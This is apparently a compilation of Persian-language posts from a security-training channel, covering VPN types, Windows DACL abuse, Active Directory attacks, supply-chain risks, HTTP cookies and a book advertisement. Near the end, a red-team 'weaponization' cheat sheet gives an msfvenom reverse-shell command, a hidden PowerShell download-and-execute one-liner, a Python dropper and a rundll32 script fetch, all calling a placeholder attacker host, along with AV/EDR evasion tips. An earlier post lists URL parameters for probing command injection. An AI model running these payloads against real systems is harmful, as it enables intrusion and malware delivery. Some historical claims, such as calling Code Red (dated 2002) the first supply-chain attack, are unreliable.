همانطور که احتمالا اطلاع دارید در منابع تاریخی معتبر ، زمان دقیق زادروز کوروش بزرگ قید نشده. تاریخ نگاران یونانی و بابلی زمان تقریبی زندگی کوروش را ۵۷۹ تا ۶۰۰ سال قبل از زادروز مسیح برآورد می‌کنند اما روز و ماه مشخصی ذکر نشده‌. پس چهارم شهریور یا هفتم آبان همگی تاریخ هایی هستند که می‌توان به عنوان شایعه ،  پیشنهاد مردمی یا نماد فرهنگی به آن نگاه کرد. بخاطر احترام به مردم عزیز ما هم این روز را به عنوان زادروز کوروش بزرگ شادباش میگوییم.

🛡 تفاوت بین SSL/TLS VPN و IPsec VPN

آیا تا به حال فکر کرده‌اید که داده‌های شما هنگام اتصال به اینترنت چگونه محافظت می‌شوند؟ ❓ VPN راه‌حل است❗️ اما دو نوع اصلی وجود دارد: SSL/TLS و IPsec. کدام یک بهتر است؟ و کدام برای شما مناسب‌تر است؟

✍️نویسنده
@TryHackBox | The Chaos

#IPSec #SSL #VPN #Cybersecurity #Networking

✅ تفاوت بین SSL/TLS و IPsec در چند نکته واضح:

1️⃣ روش کار (پایه فنی):
- ✅ SSL/TLS VPN:
- در لایه کاربردی (Application Layer) عمل می‌کند.
- ترافیک مرورگر یا برنامه‌های خاص (مانند وب و ایمیل) را رمزگذاری می‌کند.
- از پروتکل HTTPS استفاده می‌کند (مانند زمانی که یک سایت را باز می‌کنید).

- ✅ IPsec VPN:
- در لایه شبکه (Network Layer) عمل می‌کند.
- تمام ترافیک اینترنت دستگاه (حتی بازی‌ها و برنامه‌های غیرمرورگر) را رمزگذاری می‌کند.
- از پروتکل‌هایی مانند ESP و AH برای رمزگذاری کامل استفاده می‌کند.

2️⃣ سهولت استفاده و نصب:
- ✅ SSL/TLS VPN:
- گاهی اوقات به نصب برنامه اضافی نیاز ندارد (از طریق مرورگر کار می‌کند).
- برای استفاده در دستگاه‌های دیگران (مانند کافی‌نت) ایده‌آل است.

- ✅ IPsec VPN:
- نیاز به نصب کلاینت VPN اختصاصی دارد (مانند OpenVPN یا Cisco AnyConnect).
- گاهی اوقات به پیکربندی پیچیده نیاز دارد (کلیدهای مشترک، گواهی‌های دیجیتال).

3️⃣ عملکرد و سرعت:
- ✅ SSL/TLS VPN:
- در اتصالات کوتاه‌مدت (مانند باز کردن وب‌سایت‌ها) سریع‌تر است.
- ممکن است در انتقال فایل‌های بزرگ به دلیل رمزگذاری در سطح کاربردی کندتر باشد.

- ✅ IPsec VPN:
- در انتقال داده‌های حجیم (مانند دانلود فایل‌های بزرگ یا پخش ویدیو) سریع‌تر است.
- تمام ترافیک را با کارایی بالا پردازش می‌کند.

4️⃣ امنیت و حفاظت:
- ✅ SSL/TLS VPN:
- با TLS 1.2/1.3 رمزگذاری شده (بسیار امن).
- به گواهی‌های دیجیتال مانند آن‌چه در سایت‌های امن استفاده می‌شود متکی است.

💥 نکته: برخی از سرویس‌های SSL VPN از رمزگذاری اختصاصی استفاده می‌کنند که ممکن است امنیت کمتری نسبت به IPsec داشته باشد!

- ✅ IPsec VPN:
- از رمزگذاری قوی مانند AES-256 استفاده می‌کند.
- از احراز هویت دو مرحله‌ای پشتیبانی می‌کند (کلیدهای عمومی/خصوصی + رمز عبور).

💥 قابلیت: برخی از سیستم‌های IPsec از حالت "تونل دوگانه" (Double VPN) برای افزایش امنیت پشتیبانی می‌کنند!

5️⃣ سازگاری با دستگاه‌ها:
- ✅ SSL/TLS VPN:
- روی هر دستگاهی با مرورگر کار می‌کند (حتی تلفن‌ها و تبلت‌ها).
- از برخی برنامه‌های قدیمی پشتیبانی نمی‌کند.

- ✅ IPsec VPN:
- نیاز به پشتیبانی از سیستم دارد (مانند Windows, macOS, Linux).
- برخی از سیستم‌عامل‌ها (مانند iOS) ممکن است به برنامه‌های اضافی نیاز داشته باشند.

🤔 کدام را انتخاب کنید؟

- ✅ SSL/TLS VPN:
- کاربرد: مرور ایمن، اتصال سریع
- سرعت: سریع برای وب
- نصب: آسان (از طریق مرورگر)
- امنیت: خوب (بستگی به برنامه دارد)
- مثال رایج: NordVPN (از طریق مرورگر)

- ✅ IPsec VPN:
- کاربرد: رمزگذاری کامل دستگاه
- سرعت: بهتر برای فایل‌های بزرگ
- نصب: نیاز به برنامه اختصاصی دارد
- امنیت: بسیار قوی (رمزگذاری کامل)
- مثال رایج: OpenVPN, Cisco VPN

💡 نکته ناشناخته⁉️
برخی از ارائه‌دهندگان VPN (مانند Cloudflare) SSL/TLS و IPsec را در فناوری‌ای به نام "Zero Trust Network Access" ادغام می‌کنند تا بهترین حفاظت را همراه با عملکرد بالا ارائه دهند!



💥 نتیجه‌گیری نهایی:
- ✅ اگر می‌خواهید بدون پیچیدگی، مرور ایمن و سریعی داشته باشید، SSL/TLS VPN را انتخاب کنید.
- ✅ اگر نیاز به رمزگذاری کامل تمام برنامه‌های خود با حداکثر امنیت دارید، IPsec VPN را انتخاب کنید.

✍️نویسنده
@TryHackBox | The Chaos

#IPSec #SSL #VPN #Cybersecurity #Networking

✏️ مقاله تالیف شده
TLS vs. IPsec VPN Comparison

✍️نویسنده
@TryHackBox | The Chaos

#IPSec #SSL #VPN #Cybersecurity #Networking

۱. درک DACL: 
لیست کنترل دسترسی اختیاری (DACL) یک جزء حیاتی در امنیت ویندوز است. 
این لیست به عنوان نگهبان عمل میکند و تعیین می‌ کند که چه کسانی می‌ توانند به منابع خاص (فایل‌ها، دایرکتوری‌ها و غیره) دسترسی داشته باشند و چه مجوزهایی دارند. 
آن را مانند نگهبان در یک کلوپ انحصاری تصور کنید تصمیم می‌ گیرد که چه کسی وارد شود و چه کارهایی می‌ تواند داخل آنجا انجام دهد. 

۲. آسیب‌پذیری: 
گاهی اوقات، مدیران DACLها را به اشتباه پیکربندی می‌ کنند و شکاف های امنیتی ایجاد می‌ کنند. 
یک مهاجم می‌ تواند از این پیکربندی‌ های اشتباه برای کسب دسترسی غیرمجاز یا افزایش سطح دسترسی اکسپلویت کند. 

تصور کنید یک نفوذگر sneaky که به دلیل بررسی نادرست لیست مهمانان، از نگهبان عبور میکند. 

۳. تکنیک‌های رایج سوءاستفاده از DACL: 
افزایش سطح دسترسی: یک مهاجم ACEها (ورودی‌های کنترل دسترسی) را تغییر می‌ دهد تا به خود سطح دسترسی بالاتری اعطا کند. 

شمارش منابع: با تحلیل DACLها، مهاجمان اهداف ارزشمند را شناسایی می‌کنند. 

بکدور: افزودن یک ACE جدید اجازه دسترسی پایدار بدون تشخیص را می‌دهد. 

انکار سرویس: تغییر مخرب DACLها میتواند دسترسی قانونی را مختل کند. 

این مانند یک دزد ماهر است که با مهارت از لیزرهای امنیتی عبور می‌ کند تا به جواهر گرانبها برسد. 

۴. مثال‌های واقعی: 
حمله بلیت طلایی یا Golden Ticket: سوءاستفاده از DACLها برای جعل بلیت‌های Kerberos و کسب دسترسی مدیر دامنه. 
DCSync: استخراج هش‌های رمز عبور از Active Directory با دستکاری DACLها. 
ربودن اشتراک‌گذاری فایل: تغییر DACLها برای دسترسی به فایل‌های حساس در اشتراک‌گذاری‌ های شبکه. 
این exploting ها مانند دزدهای ماهر هستند که از ضعف‌های سیستم امنیتی سوءاستفاده می‌کنند. 

۵. استراتژی‌های کاهش: 
به طور منظم DACLها را حسابرسی کنید تا پیکربندی‌ های اشتباه را شناسایی کنید. 

از اصل کمترین دسترسی پیروی کنید: فقط مجوزهای لازم را اعطا کنید. 

مدیران را در مورد پیکربندی صحیح DACL آموزش دهید. 

این شبیه به تقویت پروتکل‌ های امنیتی کلوپ برای جلوگیری از ورود افراد مشکل‌ ساز است. 

۶. بازی پرریسک: 
سوءاستفاده از DACL یک بازی پرریسک است که در آن مهاجمان مجوزها را مانند قماربازان باتجربه دستکاری میکنند. 
جایزه؟ دسترسی نامحدود به سیستم‌های حیاتی و داده‌های حساس. 
سازمان‌ها باید کارت‌های خود را درست بازی کنند تا از نفوذها جلوگیری کنند.

@TryHackBox

🛡۱۰ مورد از خطرناک‌ترین روش حمله به Active Directory 🧑‍💻💻

✍️نویسنده
@TryHackBox | The Chaos

#AC #Acrive_Directory #Cybersecurity

Kerberoasting:
حمله‌ای که در آن مهاجم با درخواست بلیط‌های Kerberos مرتبط با حساب‌های سرویس، سعی در کرک کردن آن‌ها خارج از شبکه برای استخراج رمزعبورها دارد.

Password Spraying:
مهاجم یک رمزعبور رایج را بر روی تعداد زیادی از حساب‌ها آزمایش می‌کند تا از قفل شدن حساب‌ها به دلیل تلاش‌های ناموفق جلوگیری کند.

️LLMNR Poisoning:
مهاجم با جعل پاسخ‌ها در شبکه داخلی از طریق پروتکل LLMNR، درخواست‌های دستگاه‌ها را رهگیری و هش‌های رمزعبور (NTLM Hashes) را سرقت می‌کند.

Pass-the-Hash:
مهاجم از هش رمزعبور دزدیده شده برای ورود به سیستم‌ها استفاده می‌کند بدون نیاز به دانستن رمزعبور اصلی، اغلب با ابزاری مانند Mimikatz.

Default Credentials:
مهاجم از حساب‌های پیش‌فرضی که پس از نصب نرم‌افزارها یا دستگاه‌ها تغییر نکرده‌اند سوءاستفاده می‌کند، مانند admin/admin.

Hard-coded Credentials:
رمزعبورهایی که مستقیماً در کدهای برنامه، فایل‌های پیکربندی یا سیاست‌های سیستم جاسازی شده‌اند و استخراج و سوءاستفاده از آن‌ها را آسان می‌کنند.

Privilege Escalation:
مهاجم با سوءاستفاده از آسیب‌پذیری‌ها یا پیکربندی‌های نادرست، از دسترسی‌های محدود به دسترسی‌های ادمین ارتقا پیدا می‌کند.

️LDAP Reconnaissance:
مهاجم با استفاده از کوئری‌های LDAP (حتی گاهی بدون احراز هویت) اطلاعاتی درباره ساختار داخلی Active Directory مانند نام کاربران و گروه‌ها جمع‌آوری می‌کند.

BloodHound Recon:
ابزاری که با تحلیل گراف‌ها، مسیرهای افزایش دسترسی در Active Directory را شناسایی می‌کند و به مهاجم در برنامه‌ریزی دقیق حملات کمک می‌کند.

NTDS.dit Extraction:
مهاجم فایل اصلی پایگاه داده Active Directory را که حاوی تمام حساب‌های کاربری و هش‌های رمزعبور است، استخراج می‌کند.

⚠️ این حملات غالباً زمانی کشف می‌شوند که دیگر خیلی دیر شده است!
⚠️ آسیب‌پذیری‌های کوچک، حساب‌های فراموش شده و پیکربندی‌های ناامن، فرصت‌های ایده‌آلی برای مهاجمان فراهم می‌کنند.

✍️نویسنده
@TryHackBox | The Chaos

#AC #Acrive_Directory #Cybersecurity

به‌کارگیری روش‌های OSINT برای آشکارسازی احساسات و مودهای افراد

@TryHackBox

🔖 پارامترهایی که می‌توانید تزریق کامند را در آنها امتحان کنید.

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

@TryHackBox

🔐 حملات رایج زنجیره تأمین و روش‌های پیشگیری

مقدمه
امنیت زنجیره تأمین با افزایش وابستگی کسب‌وکارها به فناوری، به موضوعی حیاتی تبدیل شده است. شناخت انواع رایج حملات زنجیره تأمین و راهکارهای محافظتی ضروری است.

انواع حملات زنجیره تأمین
1️⃣ حمله مرد میانی (MITM)
- رهگیری ارتباطات بین دو طرف بدون آگاهی آن‌ها
- دستکاری داده‌ها برای دسترسی به اطلاعات حساس

2️⃣ حمله فیشینگ
- فریب کاربران برای افشای اطلاعات محرمانه مانند رمزعبور
- استفاده از ایمیل یا پیام‌های جعلی

3️⃣ دستکاری نرم‌افزار (Software Tampering)
- تغییر کد نرم‌افزار برای دسترسی به داده‌های حساس
- استفاده از کد دستکاری شده برای حمله به سیستم‌های دیگر

4️⃣ تزریق بدافزار (Malware Injection)
- وارد کردن کد مخرب به سیستم هدف (کامپیوتر یا موبایل)
- دسترسی به داده‌های حساس یا اجرای حملات دیگر

راهکارهای پیشگیری و کاهش
🔹 پیاده‌سازی اقدامات امنیتی قوی
- استفاده از فایروال، آنتی‌ویروس و سیستم‌های مانیتورینگ
- به‌روزرسانی منظم نرم‌افزارها

🔹 نظارت بر تأمین‌کنندگان سوم
- ارزیابی اقدامات امنیتی شرکای تجاری
- شناسایی و رفع آسیب‌پذیری‌های آن‌ها

🔹 آموزش کارکنان
- افزایش آگاهی درباره ریسک‌های امنیتی
- آموزش روش‌های ایمن کار با داده‌های حساس

🔹 استفاده از ارتباطات امن
- به کارگیری پروتکل‌های رمزنگاری شده
- محافظت در برابر حملات مرد میانی

تاریخچه حملات
- اولین حمله ثبت‌شده: حمله "Code Red" در سال ۲۰۰۲
- حملات مشهور: "Stuxnet" (۲۰۱۰) و "NotPetya" (۲۰۱۷)
- افزایش توجه به امنیت زنجیره تأمین در سال‌های اخیر

نتیجه‌گیری
با توجه به افزایش حملات زنجیره تأمین، کسب‌وکارها باید:
- سیستم‌های خود را به‌طور مستمر ارزیابی کنند
- از بهترین روش‌های امنیتی استفاده نمایند
- کارکنان را آموزش دهند

✍️نویسنده
@TryHackBox | The Chaos

#Supply_Chain #MITM #Cybersecurity

🚀 پارت 3 (A)

🍪 کوکی‌ها (Cookies) چیه و چه کاری انجام می‌دن؟

کوکی‌ها راهی برای شناسایی کاربران و ایجاد جلسات (Sessions) پایدار در وب هستند. در گذشته کاربران مشکلات فنی زیادی داشتند، اما کوکی‌ها به عنوان یک راه‌حل فنی برای ایجاد ارزش بیشتر به وجود اومدن.

🔹 تاریخچه مختصر:
کوکی‌ها رو اولین بار Netscape توسعه داد، اما امروز همه مرورگرهای اصلی ازشون پشتیبانی می‌کنن. اون‌ها بخش مهمی از پروتکل HTTP هستن و روی عملکرد حافظه نهان (Cache) مرورگر هم تاثیر می‌ذارن.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity

🚀 پارت 3 (B)

🧠 چطوری کار می‌کنن؟
کوکی‌ها در واقع مثل برچسب‌های "اسم من ... است" (Hello, My Name Is) هستن که سرور اون‌ها رو به کاربر می‌چسبونه.
وقتی شما یک سایت رو باز می‌کنید، اون سایت می‌تونه تمام برچسب‌هایی (کوکی‌هایی) که خودش قبلاً برای شما گذاشته رو بخونه.

🔰 در اولین بازدید:
وقتی برای اولین بار به یک سایت سر می‌زنید، سرور هیچ اطلاعاتی درباره شما نداره. اما چون حدس می‌زنه دوباره برمی‌گردید، یک کوکی منحصر به فرد برای شما می‌سازه و via مرورگر براتون ذخیره می‌کنه. اینطوری می‌تونه دفعه بعد شما رو شناسایی کنه.

این کوکی از یک جفت نام=مقدار (مثلاً user_id=12345) تشکیل شده و سرور آن را با استفاده از هدرهای پاسخ HTTP مثل Set-Cookie برای مرورگر شما می‌فرسته.

🔹 انواع کوکی‌ها:
به طور کلی دو نوع اصلی داریم:

1️⃣ کوکی Session (موقت):
این کوکی موقته و فقط هنگام حرکت شما در یک سایت فعاله. با بستن مرورگر، این کوکی پاک میشه! برای ذخیره موقت ترجیحات و تنظیمات شما به کار میره.

2️⃣ کوکی Persistent (دائمی):
این کوکی‌ها ماندگاری بیشتری دارن و حتی بعد از بستن و باز کردن مجدد مرورگر هم باقی می‌مونن! از این کوکی‌ها معمولاً برای به خاطر سپردن اطلاعات لاگین، پروفایل و تنظیمات شخصی‌شده استفاده میشه.

🔹 تفاوت اصلی:
فرق اصلی این دو در زمان انقضاشونه. اگر کوکی دارای پارامترهای Expires یا Max-Age باشه (یا پارامتر Discard رو نداشته باشه)، یک کوکی Persistent محسوب میشه.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity

📘 کتاب "وایرشارک برای رد‌تیمرها"
راهنمای تخصصی تحلیل شبکه برای هکرهای اخلاقی و تیم‌های قرمز

⚠️ توجه:
این فایل تنها نمونه‌ای از صفحات کتاب است و برخی مطالب و آموزش‌ ها به منظور حفظ اصالت اثر حذف شده‌اند. 
برای دریافت نسخه‌ی کامل و دسترسی به تمامی تمرین‌ها و سناریوها، می‌توانید کتاب را به صورت کامل خریداری کنید.

توضیحات کتاب و قیمت
توضیحات کامل
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport

Weaponization Cheat Sheet (Red Team)

اهداف این مرحله

آماده‌سازی فایل/کدی که بشه به تارگت تحویل داد.

ترکیب exploit + payload.

پنهان‌سازی تا حد امکان (AV/EDR bypass).





تکنیک‌های متداول

1. Exploit + Payload

استفاده از Metasploit msfvenom برای ساخت payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe

تزریق توی اسناد آفیس (Word/Excel):

VBA Macro payload

DDE Exploit





2. Phishing Attachments

فایل‌های weaponized:

.docm → ماکرو مخرب

.xlsm → ماکرو

.hta → ویندوز اسکریپت

.lnk → شورتکات با کد مخفی

.pdf → با جاوااسکریپت یا exploit

3. Web Delivery Payload

PowerShell One-Liner:

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

Python Dropper:

import urllib.request, os
url = "http://ATTACKER/shell.exe"
urllib.request.urlretrieve(url, "update.exe")
os.system("update.exe")

4. Obfuscation / Evasion

AV bypass:

Shellcode obfuscation با donut یا scarecrow

String encoding (Base64, XOR, AES)


EDR bypass:

LOLBins (living-off-the-land binaries) مثل:

rundll32.exe
javanoscript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("noscript:http://ATTACKER/shell.sct")

5. Payload Hosting

وب‌سرور ساده:

python3 -m http.server 80

یا استفاده از ngrok برای تونل زدن.




ابزارهای مهم

msfvenom / Metasploit

Cobalt Strike (beacon generation)

Empire / Sliver C2

ScareCrow (AV evasion)

donut (shellcode loader)

macro_pack (ماکرو سازی خودکار برای آفیس)




نویسنده

@tryhackbox | arian momeni